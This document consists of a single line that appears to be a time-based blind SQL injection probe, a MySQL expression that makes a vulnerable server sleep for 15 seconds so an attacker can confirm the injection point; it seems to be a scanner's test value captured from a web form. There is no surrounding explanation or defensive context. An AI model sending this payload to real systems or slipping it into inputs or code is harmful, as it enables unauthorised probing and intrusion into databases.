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555*if(now()=sysdate(),sleep(15),0)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